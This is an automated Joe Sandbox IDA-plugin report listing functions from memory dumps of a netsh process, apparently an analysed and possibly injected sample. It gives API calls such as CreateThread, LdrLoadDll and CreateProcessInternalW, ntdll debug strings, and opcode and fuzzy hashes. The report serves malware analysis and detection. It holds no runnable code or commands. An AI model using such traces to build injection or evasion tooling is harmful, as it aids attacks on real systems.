                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID: 4
                                                                                                      • API String ID: 724789610-4088798008
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00C1E4D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00C1E4D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00C111AA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID:
                                                                                                      • API String ID: 724789610-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C09335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00C111F0,00C26667,00C23F47,?), ref: 00C17463
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C13D52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,00C175E3,00000010,?,?,?,00000044,?,00000010,00C175E3,?,?,?), ref: 00C27D53
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateInternalProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2186235152-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C09335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C13D52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,6E6D6C6B,00000007,00000000,00000004,00000000,00C135BD,000000F4,?,?,?,?,?), ref: 00C27C9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3298025750-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00C10EF9,?,00C243E5,00C10EF9,00C23F47,00C243E5,?,00C10EF9,00C23F47,00001000,?,?,00C294F1), ref: 00C27C4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00C1764C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00C111F0,00C26667,00C23F47,?), ref: 00C17463
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 037E4742
                                                                                                      • Execute=1, xrefs: 037E4713
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037E46FC
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 037E4655
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 037E4725
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 037E4787
                                                                                                      • ExecuteOptions, xrefs: 037E46A0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: bf53ecfeca6ce405dd623e6825c02c466817c9933be9ab884748f8d905b7c57a
                                                                                                      • Instruction ID: 1e9125de7d0a621d223130c720db8b8c2536f2d98331d07fd25ec38a9436f2ef
                                                                                                      • Opcode Fuzzy Hash: bf53ecfeca6ce405dd623e6825c02c466817c9933be9ab884748f8d905b7c57a
                                                                                                      • Instruction Fuzzy Hash: 4E512935A00759BADF24EBE8DC89FED73B8AF88305F0401D9E505AB181EB719A418F50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                      • Instruction ID: 8b2b43d398f8c177298709527d3fa867612b631171b2291e2fd625b7ec1b74f9
                                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                      • Instruction Fuzzy Hash: 88024374608345AFC704CF58C494A6BBBF5EFC9700F148A6DF9998B660EB31E905CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction ID: b697ad81d9b5d976c129f09e35ac4334dd4f663ffc2d8b37adf70d074b07dc9a
                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction Fuzzy Hash: C8817C74E052499FDF28CE68C8917FEBBB6AF85324F1C425EEC61A7391C6349840DB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 72c124b8cefce246b3a493eaf24c72e9ab73aa7c9827b76811830a32e242d367
                                                                                                      • Instruction ID: 1cf07dc321a93b1abd728cf48939d905408afd793146d9a07d48870897ccefce
                                                                                                      • Opcode Fuzzy Hash: 72c124b8cefce246b3a493eaf24c72e9ab73aa7c9827b76811830a32e242d367
                                                                                                      • Instruction Fuzzy Hash: 19216576E00229ABDB50DFB9CC44EEEBBF8EF44644F08055AE915D7201E730E9418BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037E02E7
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037E02BD
                                                                                                      • RTL: Re-Waiting, xrefs: 037E031E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 5c02ac4ab8f70fe672760b5ae1426dabb68587e93aa40e51f9a1c4a3927f549e
                                                                                                      • Instruction ID: e0dafd784f0cb904c343b4f0162c545778a66a02aef5fe36405fcc0b0c72414a
                                                                                                      • Opcode Fuzzy Hash: 5c02ac4ab8f70fe672760b5ae1426dabb68587e93aa40e51f9a1c4a3927f549e
                                                                                                      • Instruction Fuzzy Hash: 70E1BF746047419FEB25CF29D884B6AB7E4BF88314F180A6EF5A5CB2E1D7B4D844CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • RTL: Resource at %p, xrefs: 037E7B8E
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 037E7B7F
                                                                                                      • RTL: Re-Waiting, xrefs: 037E7BAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: 36262f8985771337f28ae38f3eb31d63d9785f5673845298c6df22eef0eb7a6c
                                                                                                      • Instruction ID: dcfa0507b593d9746b7afdda15c78ffd7f766e59455a052032da70166da03cc2
                                                                                                      • Opcode Fuzzy Hash: 36262f8985771337f28ae38f3eb31d63d9785f5673845298c6df22eef0eb7a6c
                                                                                                      • Instruction Fuzzy Hash: B641D235304B429FC728DE29C840B6AB7E5EF88710F180A1DF95ADB780DB71E8059B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037E728C
                                                                                                      Strings
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 037E7294
                                                                                                      • RTL: Resource at %p, xrefs: 037E72A3
                                                                                                      • RTL: Re-Waiting, xrefs: 037E72C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: aaae0b9a9e855e72927cc6f1fc5052304f0ad8a95cbf91d7eb1c9226b2fcd280
                                                                                                      • Instruction ID: ef30d59f2ca7fffe872eb4075cf5e1913a3c13d3447b4fe30ca5d4d0ab4204fc
                                                                                                      • Opcode Fuzzy Hash: aaae0b9a9e855e72927cc6f1fc5052304f0ad8a95cbf91d7eb1c9226b2fcd280
                                                                                                      • Instruction Fuzzy Hash: 1241CC36700746AFCB24DE69CC41B6AB7B9FB88710F180619F955EB280DB21E852DBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: e20771e05d882703cae95129619592bae93b7e48c9eba0b2d3e5159bda5abdff
                                                                                                      • Instruction ID: cf40d9ae06ca4305820bbe55b9ab79d0bcf7c5f0d242a7fc1c55963ab9f4d3d1
                                                                                                      • Opcode Fuzzy Hash: e20771e05d882703cae95129619592bae93b7e48c9eba0b2d3e5159bda5abdff
                                                                                                      • Instruction Fuzzy Hash: 7C319A76A002299FDB60DF69DC44FEEB7F8EF44610F840599E849E7140EB30DA449BA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction ID: baef4346e1eae167a58fa0d530243397b78e668938230c61b0d70da625659392
                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction Fuzzy Hash: 5391A370E0029ADFDF28DE69C881BFEB7B5EF84760F58451AE865EB2C0D73089418715
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: 3c304e11f747262d075f7ea8c809dee9426cf759e76fb54cd736eaf3e2a7febe
                                                                                                      • Instruction ID: 821ee96b9abc9e076333fdb3a4a759db97f1d824ed3876176fc6449c043f180b
                                                                                                      • Opcode Fuzzy Hash: 3c304e11f747262d075f7ea8c809dee9426cf759e76fb54cd736eaf3e2a7febe
                                                                                                      • Instruction Fuzzy Hash: A1814A75D012699BDB31DB54CC44BEEB7B8AF49710F0445EAEA19B7280E7309E81CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%